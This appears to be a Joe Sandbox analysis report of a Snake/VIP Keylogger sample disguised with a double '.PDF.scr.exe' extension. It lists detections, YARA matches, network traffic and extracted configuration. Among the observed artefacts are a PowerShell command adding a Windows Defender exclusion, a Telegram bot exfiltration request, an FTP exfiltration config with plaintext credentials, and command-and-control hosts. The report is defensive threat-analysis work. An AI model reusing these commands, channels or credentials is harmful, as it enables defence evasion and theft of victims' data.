Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pre-stowage.PDF.scr.exe

Overview

General Information

Sample name:pre-stowage.PDF.scr.exe
Analysis ID:1576531
MD5:68dfd91fce9ad3d728a7c25716990edd
SHA1:6a6843531a77b77892813360b3daf0b0bbfea8c2
SHA256:525248e53005e0ec5a39b4aa00c2323e9f5be5a256ddd944707aba1b3dedba58
Tags:exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • pre-stowage.PDF.scr.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe" MD5: 68DFD91FCE9AD3D728A7C25716990EDD)
    • powershell.exe (PID: 816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7268 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • pre-stowage.PDF.scr.exe (PID: 6896 cmdline: "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe" MD5: 68DFD91FCE9AD3D728A7C25716990EDD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "FTP", "Username": "belogswork@inhanoi.net.vn", "Password": "usarmy11111@@", "FTP Server": "ftp://ftp.inhanoi.net.vn/", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d91c:$a1: get_encryptedPassword
        • 0x2dc21:$a2: get_encryptedUsername
        • 0x2d728:$a3: get_timePasswordChanged
        • 0x2d823:$a4: get_passwordField
        • 0x2d932:$a5: set_encryptedPassword
        • 0x2efbf:$a7: get_logins
        • 0x2ef22:$a10: KeyLoggerEventArgs
        • 0x2eb87:$a11: KeyLoggerEventArgsEventHandler
        00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 13 entries
          SourceRuleDescriptionAuthorStrings
          0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bd1c:$a1: get_encryptedPassword
                • 0x2c021:$a2: get_encryptedUsername
                • 0x2bb28:$a3: get_timePasswordChanged
                • 0x2bc23:$a4: get_passwordField
                • 0x2bd32:$a5: set_encryptedPassword
                • 0x2d3bf:$a7: get_logins
                • 0x2d322:$a10: KeyLoggerEventArgs
                • 0x2cf87:$a11: KeyLoggerEventArgsEventHandler
                0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x39bad:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x39250:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x394ad:$a4: \Orbitum\User Data\Default\Login Data
                • 0x39e8c:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 27 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", ParentImage: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe, ParentProcessId: 7128, ParentProcessName: pre-stowage.PDF.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", ProcessId: 816, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", ParentImage: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe, ParentProcessId: 7128, ParentProcessName: pre-stowage.PDF.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", ProcessId: 816, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", ParentImage: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe, ParentProcessId: 7128, ParentProcessName: pre-stowage.PDF.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", ProcessId: 816, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:33:54.680510+010028033053Unknown Traffic192.168.2.749706172.67.177.134443TCP
                2024-12-17T08:34:03.417453+010028033053Unknown Traffic192.168.2.749718172.67.177.134443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:33:50.274773+010028032742Potentially Bad Traffic192.168.2.749702193.122.130.080TCP
                2024-12-17T08:33:53.068957+010028032742Potentially Bad Traffic192.168.2.749702193.122.130.080TCP
                2024-12-17T08:33:55.975234+010028032742Potentially Bad Traffic192.168.2.749713193.122.130.080TCP
                2024-12-17T08:33:58.850266+010028032742Potentially Bad Traffic192.168.2.749715193.122.130.080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: pre-stowage.PDF.scr.exeAvira: detected
                Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "belogswork@inhanoi.net.vn", "Password": "usarmy11111@@", "FTP Server": "ftp://ftp.inhanoi.net.vn/", "Version": "4.4"}
                Source: pre-stowage.PDF.scr.exeReversingLabs: Detection: 28%
                Source: pre-stowage.PDF.scr.exeVirustotal: Detection: 30%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: pre-stowage.PDF.scr.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: pre-stowage.PDF.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49703 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49733 version: TLS 1.2
                Source: pre-stowage.PDF.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: DjCW.pdb source: pre-stowage.PDF.scr.exe
                Source: Binary string: DjCW.pdbSHA256 source: pre-stowage.PDF.scr.exe

                Networking

                barindex
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2018/12/2024%20/%2003:49:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49715 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49713 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49718 -> 172.67.177.134:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49706 -> 172.67.177.134:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49703 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2018/12/2024%20/%2003:49:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 17 Dec 2024 07:34:18 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3769722427.00000000061D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros4
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1319452030.0000000003021000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20a
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002ABA000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002AFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002980000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002AFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
